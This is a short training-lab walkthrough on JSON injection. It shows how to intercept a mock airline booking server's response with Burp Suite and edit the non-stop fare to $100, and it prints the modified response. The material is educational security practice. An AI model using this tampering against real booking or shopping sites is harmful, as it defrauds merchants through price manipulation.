Ajax Security: JSON Injection

Goal: 

JSON widely used than XML due to its ease of use and speed. In this lab, our target is to perform JSON injection to airline ticket system to get the non-stop ticket and for a cheaper price. 

Method: 

Using Burp Suite or other proxy tool to perform interception and JSON injection attack.  

Step by step Guide

1. Start up Burp suite interception, ensure Interception responses also enabled. To enable Response Interception, goto Proxy=>option


2. Enter Source and destination(BOS to SEA)

3. From Burp Click forward couple of request and you will see intercepted Response from Server:

4. Now Modify price for Non-stop ticket price change to $100, then forward

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Cache-Control: no-cache

Content-Type: text/html

Date: Wed, 12 Jul 2017 00:16:34 GMT

Connection: close

Content-Length: 169

 

{

"From": "Boston",

"To": "Seattle",

"flights": [

{"stops": "0", "transit" : "N/A", "price": "$100"},

{"stops": "2", "transit" : "Newark,Chicago", "price": "$300"}

]

}

 

5. Now Non-stop flight shown as 100$, choose and submit.  

Please publish modules in offcanvas position.